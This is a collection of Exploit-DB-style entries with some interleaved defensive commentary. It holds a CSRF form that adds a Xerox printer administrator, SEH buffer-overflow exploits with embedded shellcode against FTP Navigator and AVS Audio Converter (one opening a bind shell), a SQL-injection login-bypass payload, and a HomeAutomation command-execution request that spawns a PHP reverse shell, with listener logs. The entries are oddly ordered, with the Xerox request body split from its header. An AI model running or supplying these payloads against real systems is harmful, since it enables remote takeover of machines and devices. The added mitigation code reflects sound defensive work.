Upgrade-Insecure-Requests: 1

CSRFToken=72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1

HTTP Response :

HTTP/1.1 200 OK
Date: Wed, 18 Dec 2019 22:09:40 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 13518

CSRF HTML PoC :

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://server/dummypost/xerox.set" method="POST">
      <input type="hidden" name="CSRFToken" value="72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776" />
      <input type="hidden" name="_fun_function" value="HTTP_Set_ccgen_fac_dispatch_fn" />
      <input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?x=&sort=Fname&order=Up" />
      <input type="hidden" name="CcgenModule" value="UserEdit" />
      <input type="hidden" name="isRoles" value="True" />
      <input type="hidden" name="isPassword" value="True" />
      <input type="hidden" name="isCreate" value="True" />
      <input type="hidden" name="rolesStr" value="2,5,1," />
      <input type="hidden" name="limited" value="False" />
      <input type="hidden" name="oid" value="0" />
      <input type="hidden" name="userName" value="ismailtasdelen" />
      <input type="hidden" name="friendlyName" value="Ismail Tasdelen" />
      <input type="hidden" name="newPassword" value="Test1234" />
      <input type="hidden" name="retypePassword" value="Test1234" />
      <input type="hidden" name="role" value="2" />
      <input type="hidden" name="role" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
-
FTP Navigator 8.03 - Stack Overflow (SEH)
# Exploit Title: FTP Navigator 8.03 - Stack Overflow (SEH)
# Date: December 28th, 2019
# Exploit Author: boku
# Discovered by: Chris Inzinga
# Original DoS: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
# Original DoS Link: https://www.exploit-db.com/exploits/47794
# Software Vendor: http://www.internet-soft.com/
# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
# Version: Version 8.03
# Tested on: Microsoft Windows 7 Enterprise - 6.1.7601 Service Pack 1 Build 7601 (x86-64)
#!/usr/bin/python
# Recreate:
# 1) Generate 'poc.txt' payload using python 2.7.x
# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
# 3) Install & Open FTP Navigator v8.03
# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
#    - A textbox will appear on the bottom of the right window
# 5) Paste payload from generated txt file into textbox
# 6) Click "Do it"
#    - The program will crash & calculator will open

blt = '\033[92m[\033[0m+\033[92m]\033[0m '  # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m '  # bash red error bullet
File = 'poc.txt'  # defined before the try so the except branch can name it

try:
    nops = '\x90'*400
    # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
    # x86/alpha_upper succeeded with size 447 (iteration=0)
    shellcode =  b""
    shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
    shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
    shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
    shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
    shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
    shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
    shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
    shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
    shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
    shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
    shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
    shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
    shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
    shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
    shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
    shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
    shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
    shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
    shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
    shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
    shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
    shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
    shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
    shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
    shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
    shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
    shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
    shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
    shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
    shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
    shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
    shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
    shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
    shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
    shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
    shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
    shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
    shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
    shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
    shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
    shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"

    jmp2nops  = '\xe8\xff\xff\xff\xff'   # call +4        // This call will land us at the last \xff of our call instruction
    jmp2nops += '\xc3'                   # ret/inc ebx    // Since EIP is at \xff after call, this will be interpreted as: \xff\xc3 = inc ebx (a nop instruction)
    jmp2nops += '\x59'                   # pop ecx        // Pop the memory location from the call instruction that was pushed onto the stack into the ECX register
    jmp2nops += '\x31\xd2'               # xor edx, edx   // Clear the EDX register. We are going to jump to the beginning of our buffer.
    jmp2nops += '\x66\x81\xca\xfc\x0f'   # or dx, 4092    // EDX is now equal to 0x00000ffc
    jmp2nops += '\x66\x29\xd1'           # sub cx, dx     // We subtract 4092 bytes from our memory location in the ECX register.
    jmp2nops += '\xff\xe1'               # jmp ecx        // Now we jump back to the beginning of our buffer; into our NOP sled.

    offset = '\x41' * (4112-len(nops+shellcode+jmp2nops))
    nSEH = '\xeb\xeb\x90\x90'            # jmp short -22 (to jmp2nops)
    # 0x00457576 [ftpnavi.exe] : pop edx # pop ebx # ret # | Rebase: False | ASLR: False | SafeSEH: False
    # | (c:\FTP Navigator\ftpnavi.exe) | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ}
    SEH = '\x76\x75\x45'                 # SEH 3 byte overwrite

    payload = nops+shellcode+offset+jmp2nops+nSEH+SEH

    f = open(File, 'w')                  # open file for write
    f.write(payload)
    f.close()                            # close the file
    print blt + File + " created successfully "
except:
    print err + File + ' failed to create'
-
AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
# Exploit Title: AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
# Date: 2019-12-28
# Exploit Author: boku
# Original DoS: https://www.exploit-db.com/exploits/47788
# Original DoS Author: ZwX
# Software Vendor: http://www.avs4you.com/
# Software Link: http://www.avs4you.com/avs-audio-converter.aspx
# Version: 9.1.2.600
# Tested on: Microsoft Windows 10 Home 1909(x86-64) - 10.0.18363 N/A Build 18363
#            Microsoft Windows 7 Enterprise(x86-64) - 6.1.7601 Service Pack 1 Build 7601

#!/usr/bin/python
# Recreate:
# 1) Generate the 'bind9999.txt' payload using python 2.7.x on Kali Linux.
# 2) On the victim Windows machine, open the file 'bind9999.txt' with notepad, then Select-All > Copy.
# 3) Install & Open AVS Audio Converter 9.1.2.600.
# 4) Locate the textbox to the right of 'Output Folder:'; at the bottom of the main window.
# 5) Paste the copied payload from the 'bind9999.txt' file into the textbox.
# 6) Click the 'Browse...' button; to the right of the textbox.
#    - The program will freeze & a bind shell will be listening on tcp port 9999; on all interfaces.
# Special thanks to: The Offsec Team, Corelan Team, Vivek/Pentester Academy Team, Skape

blt = '\033[92m[\033[0m+\033[92m]\033[0m '  # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m '  # bash red error bullet
File = 'bind9999.txt'

try:
    # 0x00400000 [AVSAudioConverter.exe] # 9.1.2.600 (C:\Program Files (x86)\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
    # - The only module that has SafeSEH disabled.
    # Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll |
    # 0x00400000 | 0x00f33000 | False  | False   | False | False    | False  |
    # - Attempting a 3-byte SEH-handler overwrite will fail due to no exception being thrown.
    offEdx = '\x41'*260
    edx = '\x42\x42\x42\x42'  # EDX overwrite at 260 bytes. EDX=0x42424242
    # SEH-Record overwrite at offset 264; the goal from here is to not throw an exception or we're screwed.
    nSEH = '\x42'*4
    SEH = '\x43'*4
    # - If address at offset 308 is not readable, then the program will throw an exception at:
    #     75F9ECE7   3806   cmp byte ptr ds:[esi], al
    #     [!] Access violation when reading [esi]
    # - If we can get past this exception, we can overwrite EIP at offset 304.
    # - [esi] must be successfully overwritten so we can put our payload after it.
    offEip = '\x45'*32
    # - AVSAudioEditor5.dll is the only other module with both ASLR & Rebase disabled.
    # - The enabled SafeSEH blocks us from using it for a SEH overwrite, but we can still jump
    #   to it with a vanilla EIP overwrite; due to overwriting a return address on the stack.
    # - After bypassing the ESI read exception, our stack will look like this after the EIP overwrite:
    #   ECX=0018FA60  ESP=0018FA60  (Stack locations will vary)
    #    0018FA54  45454545  EEEE  // [296]
    #    0018FA58  45454545  EEEE  // [300]
    #    0018FA5C  1006563E  V...  // [304] eip var       # Pointer to 'pop+ret'
    #   *0018FA60  00000000  ....  // [308] esi var       # our esi address gets replaced by 4 nulls
    #    0018FA64  1006A438  8...  // [312] jmpEsp var    # Pointer to 'jmp esp'
    #    0018FA68  E510EC10  ....  // [316] fixStack var  # ASM to fix the Stack so shellcode will work
    # [AVSAudioEditor5.dll] (C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSAudioEditor5.dll)
    # Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll |
    # 0x10000000 | 0x100a1000 | False  | True    | False | False    | False  |
    # 0x1006563e : pop esi # ret | ascii {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
    eip = '\x3e\x56\x06\x10'  # pop+ret
    # - After pop+ret, ESP=0018FA68
    esi = '\x10\x10\x08\x10'  # [AVSAudioEditor5.dll] | .data | RW
    # 0x1006a438 : jmp esp | {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
    # - the esi var address is just a random, readable memory location that will not move; to bypass the exception.
    jmpEsp = '\x38\xa4\x06\x10'  # jmp esp pointer
    # EBP is 45454545 at this point. Needs to be fixed for most shellcode payloads to work properly.
    fixStack = '\x83\xEC\x10'   # sub esp, 0x10
    fixStack += '\x89\xE5'      # mov ebp, esp
    fixStack += '\x83\xEC\x60'  # sub esp, 0x60

    # msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b '\x00' --format python
    # x86/shikata_ga_nai succeeded with size 355 (iteration=0)
    shellcode = b""
    shellcode += b"\xbe\xd8\x49\x8d\x72\xd9\xe5\xd9\x74\x24\xf4"
    shellcode += b"\x5a\x31\xc9\xb1\x53\x31\x72\x12\x83\xea\xfc"
    shellcode += b"\x03\xaa\x47\x6f\x87\xb6\xb0\xed\x68\x46\x41"
    shellcode += b"\x92\xe1\xa3\x70\x92\x96\xa0\x23\x22\xdc\xe4"
    shellcode += b"\xcf\xc9\xb0\x1c\x5b\xbf\x1c\x13\xec\x0a\x7b"
    shellcode += b"\x1a\xed\x27\xbf\x3d\x6d\x3a\xec\x9d\x4c\xf5"
    shellcode += b"\xe1\xdc\x89\xe8\x08\x8c\x42\x66\xbe\x20\xe6"
    shellcode += b"\x32\x03\xcb\xb4\xd3\x03\x28\x0c\xd5\x22\xff"
    shellcode += b"\x06\x8c\xe4\xfe\xcb\xa4\xac\x18\x0f\x80\x67"
    shellcode += b"\x93\xfb\x7e\x76\x75\x32\x7e\xd5\xb8\xfa\x8d"
    shellcode += b"\x27\xfd\x3d\x6e\x52\xf7\x3d\x13\x65\xcc\x3c"
    shellcode += b"\xcf\xe0\xd6\xe7\x84\x53\x32\x19\x48\x05\xb1"
    shellcode += b"\x15\x25\x41\x9d\x39\xb8\x86\x96\x46\x31\x29"
    shellcode += b"\x78\xcf\x01\x0e\x5c\x8b\xd2\x2f\xc5\x71\xb4"
    shellcode += b"\x50\x15\xda\x69\xf5\x5e\xf7\x7e\x84\x3d\x90"
    shellcode += b"\xb3\xa5\xbd\x60\xdc\xbe\xce\x52\x43\x15\x58"
    shellcode += b"\xdf\x0c\xb3\x9f\x20\x27\x03\x0f\xdf\xc8\x74"
    shellcode += b"\x06\x24\x9c\x24\x30\x8d\x9d\xae\xc0\x32\x48"
    shellcode += b"\x5a\xc8\x95\x23\x79\x35\x65\x94\x3d\x95\x0e"
    shellcode += b"\xfe\xb1\xca\x2f\x01\x18\x63\xc7\xfc\xa3\xac"
    shellcode += b"\x17\x88\x42\xd8\x37\xdc\xdd\x74\xfa\x3b\xd6"
    shellcode += b"\xe3\x05\x6e\x4e\x83\x4e\x78\x49\xac\x4e\xae"
    shellcode += b"\xfd\x3a\xc5\xbd\x39\x5b\xda\xeb\x69\x0c\x4d"
    shellcode += b"\x61\xf8\x7f\xef\x76\xd1\x17\x8c\xe5\xbe\xe7"
    shellcode += b"\xdb\x15\x69\xb0\x8c\xe8\x60\x54\x21\x52\xdb"
    shellcode += b"\x4a\xb8\x02\x24\xce\x67\xf7\xab\xcf\xea\x43"
    shellcode += b"\x88\xdf\x32\x4b\x94\x8b\xea\x1a\x42\x65\x4d"
    shellcode += b"\xf5\x24\xdf\x07\xaa\xee\xb7\xde\x80\x30\xc1"
    shellcode += b"\xde\xcc\xc6\x2d\x6e\xb9\x9e\x52\x5f\x2d\x17"
    shellcode += b"\x2b\xbd\xcd\xd8\xe6\x05\xfd\x92\xaa\x2c\x96"
    shellcode += b"\x7a\x3f\x6d\xfb\x7c\xea\xb2\x02\xff\x1e\x4b"
    shellcode += b"\xf1\x1f\x6b\x4e\xbd\xa7\x80\x22\xae\x4d\xa6"
    shellcode += b"\x91\xcf\x47"

    payload = offEdx+edx+nSEH+SEH+offEip+eip+esi+jmpEsp+fixStack+shellcode
    # offsets:  0     260 264  268 272    304 308 312    316      324

    f = open(File, 'w')  # open file for write
    f.write(payload)
    f.close()            # close the file
    print blt + File + " created successfully "
    # root@kali# nc <Victim IP> 9999
    # Microsoft Windows [Version 6.1.7601]
    # C:\Program Files (x86)\AVS4YOU\AVSAudioConverter>
except:
    print err + File + ' failed to create'
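Both write-ups above (FTP Navigator and AVS Audio Converter) hinge on modules whose Rebase, ASLR and NXCompat columns are all False at a fixed ImageBase, which is what makes the hard-coded pop/pop/ret, pop esi/ret and jmp esp addresses usable. As an added example that is not part of either exploit, the following reads exactly those DllCharacteristics bits and the ImageBase out of a PE header with the standard library, so an administrator can list which of their own loaded modules ship without ASLR and DEP. SafeSEH lives in the load-config directory rather than in these bits and is not parsed here; the PE image used for testing is constructed, not a real binary, and the offsets come from the PE/COFF specification.

```python
import struct

# DllCharacteristics bits (PE/COFF specification)
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040   # ASLR-compatible
IMAGE_DLLCHARACTERISTICS_NX_COMPAT = 0x0100      # DEP-compatible
IMAGE_DLLCHARACTERISTICS_NO_SEH = 0x0400         # image declares no SEH handlers

PE32_MAGIC = 0x10B
PE32PLUS_MAGIC = 0x20B


def parse_pe_mitigations(data):
    """Return ImageBase and the ASLR/DEP/NO_SEH flags of a PE image.

    data: raw bytes of the file (only the headers are read).
    Raises ValueError for anything that is not a well-formed PE header.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]  # SizeOfOptionalHeader
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    if size_opt < 72 or len(data) < opt + size_opt:
        raise ValueError("optional header too short")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == PE32_MAGIC:
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == PE32PLUS_MAGIC:
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # DllCharacteristics is at offset 70 in both the PE32 and PE32+ optional header
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        "image_base": image_base,
        "aslr": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE),
        "nx": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NX_COMPAT),
        "no_seh": bool(dll_chars & IMAGE_DLLCHARACTERISTICS_NO_SEH),
    }


def missing_mitigations(data):
    """Names of the mitigations the image lacks, e.g. ['ASLR', 'DEP']."""
    info = parse_pe_mitigations(data)
    checks = (("ASLR", info["aslr"]), ("DEP", info["nx"]))
    return [name for name, present in checks if not present]


def build_fake_pe(image_base, dll_chars, pe32plus=False):
    """Constructed header-only PE image for testing; not a real binary."""
    magic = PE32PLUS_MAGIC if pe32plus else PE32_MAGIC
    opt = bytearray(240 if pe32plus else 224)
    struct.pack_into("<H", opt, 0, magic)
    if pe32plus:
        struct.pack_into("<Q", opt, 24, image_base)
    else:
        struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<H", opt, 70, dll_chars)
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x0102)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)             # e_lfanew
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            info = parse_pe_mitigations(fh.read(4096))
        print("%s base=0x%08x missing=%s" % (path, info["image_base"],
                                              ",".join(missing_mitigations(open(path, "rb").read(4096))) or "none"))
```

Run it against the executables and DLLs a product installs; any module reporting both ASLR and DEP missing is the kind of fixed-address gadget source the two exploits depend on, and a vendor rebuild with /DYNAMICBASE and /NXCOMPAT removes it.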
-
elearning-script 1.0 - Authentication Bypass
# Exploit Title: elearning-script 1.0 - Authentication Bypass
# Author: riamloo
# Date: 2019-12-29
# Vendor Homepage: https://github.com/amitkolloldey/elearning-script
# Software Link: https://github.com/amitkolloldey/elearning-script/archive/master.zip
# Version: 1
# CVE: N/A
# Tested on: Win 10

# Description:
# E Learning Blog Developed In Raw PHP

# Vulnerability: Attacker can bypass the login page and access the dashboard page
# Vulnerable file : /login.php
# Parameter & Payload: '=''or'

# Proof of Concept:
http://localhost/elearning-script-master/login.php

POST /elearning-script-master/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
Content-Length: 445
Referer: http://localhost/elearning-script-master/login.php
Cookie: PHPSESSID=a81sp8jg62nzxs8icvbf44ep3iu
Connection: close
Upgrade-Insecure-Requests: 1

'=''or'
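The payload above only works when the login check is assembled by string concatenation: with `'=''or'` in both fields the predicate becomes `username=''=''or'' AND password=''=''or''`, and on a database that coerces the empty string to 0 in a numeric comparison (MySQL does) `username='' = ''` evaluates to `0 = 0`, which is true for every row. The added example below (not code from elearning-script; the table and column names are assumptions) shows the query text the concatenated form produces and the parameterised form that compares the same input as a literal value. SQLite is used only to exercise the safe path offline.

```python
import sqlite3

PAYLOAD = "'=''or'"   # the value the advisory above submits for both fields


def build_vulnerable_query(username, password):
    """The SQL a concatenating login check sends (assumed shape of the query).

    Returned only as text: the quotes in the payload become SQL syntax."""
    return ("SELECT * FROM users WHERE username='%s' AND password='%s'"
            % (username, password))


def make_db():
    """Constructed in-memory users table; not the project's schema."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return con


def login_safe(con, username, password):
    """Parameterised check: the driver binds the values, so the payload is
    compared as the eight-character string it is and never parsed as SQL."""
    row = con.execute(
        "SELECT COUNT(*) FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] > 0
```

In PHP the equivalent of `login_safe` is a `mysqli`/PDO prepared statement with bound parameters; escaping alone does not address the `0 = ''` coercion, because the payload contains no character that escaping would neutralise beyond the quotes.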
-
HomeAutomation 3.3.2 - Remote Code Execution
# Exploit: HomeAutomation 3.3.2 - Remote Code Execution
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5560
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php

HomeAutomation v3.3.2 CSRF Remote Command Execution (PHP Reverse Shell) PoC

Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2

Summary: HomeAutomation is an open-source web interface and scheduling solution. It was initially made for use with the Telldus TellStick, but is now based on a plugin system and except for Tellstick it also comes with support for Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers, etc.) based on an advanced scheduling system, taking into account things like measurements from various sensors. With the houseplan view you can get a simple overview of the status of your devices at their location in your house.

Desc: The application suffers from an authenticated OS command execution vulnerability in the custom command v0.1 plugin. Combined with the CSRF vulnerability, this can be exploited to execute arbitrary shell commands as the web user via the 'set_command_on' and 'set_command_off' POST parameters in '/system/systemplugins/customcommand/customcommand.plugin.php', which passes the stored value to an unsanitized PHP exec() call.

===============================================================================
/system/systemplugins/customcommand/customcommand.plugin.php:
-------------------------------------------------------------

77:  function toggleDevices($devicesToToggle, $statuses) {
78:    $output = array();
79:    $command = "";
80:
81:    foreach($devicesToToggle as $device)
82:    {
83:      $status = $statuses[$device["id"]];
84:      if($status == 0) {
85:        $command = $this->getSettings("command_off");
86:      } else {
87:        $command = $this->getSettings("command_on");
88:      }
89:
90:      if(!empty($command)) {
91:        $command = replaceCustomStrings($command, $device, $statuses[$device["id"]]);
92:
93:        exec($command, $output);
94:
95:        SaveLog("Command: ".$command."\nOutput:\n".parseExecOutputToString($output));
96:      }
97:    }
98:
99:    return "";
100: }
===============================================================================

Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
           Apache/2.4.29 (Ubuntu)
           PHP/7.4.0RC4
           PHP/7.3.11
           PHP 7.2.24-0ubuntu0.18.04.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2019-5560
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php

06.11.2019

--

POST /homeautomation_v3_3_2/?page=conf-systemplugins HTTP/1.1

plugin=customcommand&action=savesettings&set_command_on=php+-r+%27%24sock%3Dfsockopen%28%22127.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&set_command_off=&savesettings=Save

-

lqwrm@metalgear:/$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from localhost 40724 received!
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/homeautomation_v3_3_2
$ exit
lqwrm@metalgear:/$
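The root cause in toggleDevices() above is that the stored template goes through a shell, so whatever an administrator (or a forged request acting as one) puts in 'set_command_on' is executed verbatim. The following is an added example, not HomeAutomation code: the same "run a configured command when a device toggles" behaviour written so the template is split into an argv list, checked against a program allowlist, refused if any shell metacharacter survives, and run without a shell. The allowed programs and the `#deviceid#`/`#status#` placeholder names are assumptions of this example, standing in for whatever replaceCustomStrings() expands.

```python
import shlex
import subprocess

# Programs an administrator may reference in a command template (assumed policy)
ALLOWED_PROGRAMS = {"/bin/echo", "/usr/bin/tdtool"}
# Characters that only mean something to a shell; with no shell involved they
# indicate a template that tried to chain or substitute a command
SHELL_METACHARS = set(";|&$`<>()\n\r")


class UnsafeCommand(ValueError):
    """Raised when a stored template cannot be executed as a plain argv list."""


def build_argv(template, device_id, status):
    """Turn a stored template into an argv list, substituting device fields
    into individual arguments after the template has been tokenised."""
    try:
        words = shlex.split(template)
    except ValueError as exc:                 # unbalanced quotes
        raise UnsafeCommand("bad quoting: %s" % exc)
    if not words:
        raise UnsafeCommand("empty command")
    if words[0] not in ALLOWED_PROGRAMS:
        raise UnsafeCommand("program not allowed: %r" % words[0])
    argv = []
    for word in words:
        if SHELL_METACHARS & set(word):
            raise UnsafeCommand("shell metacharacter in %r" % word)
        argv.append(word.replace("#deviceid#", str(device_id))
                        .replace("#status#", str(status)))
    return argv


def is_safe_template(template):
    """True if the template would be accepted by build_argv()."""
    try:
        build_argv(template, 0, 0)
        return True
    except UnsafeCommand:
        return False


def toggle_device(template, device_id, status):
    """What exec($command) did, but as argv with no shell; returns stdout."""
    argv = build_argv(template, device_id, status)
    proc = subprocess.run(argv, capture_output=True, text=True, check=False)
    return proc.stdout
```

Validating at save time (the 'savesettings' handler) with `is_safe_template()` gives the administrator an immediate error instead of a stored command that only fails, or fires, later; the CSRF side of the advisory still needs a per-session token on that settings form.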
-
Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
# Software : Xerox Printer
# Product Version: AltaLink C8035
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware.
# A request to add users is made in the Device User Database form field. This request is captured with
# a proxy and a CSRF PoC HTML file is prepared from it. Xerox AltaLink C8035 printers allow CSRF: a request
# to add users is made from the Device User Database form to the xerox.set URI.
# (The frmUserName value must have a unique name.)

# HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 707
Origin: https://XXX.XXX.XXX.XXX
Connection: close
Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
Upgrade-Insecure-Requests: 1

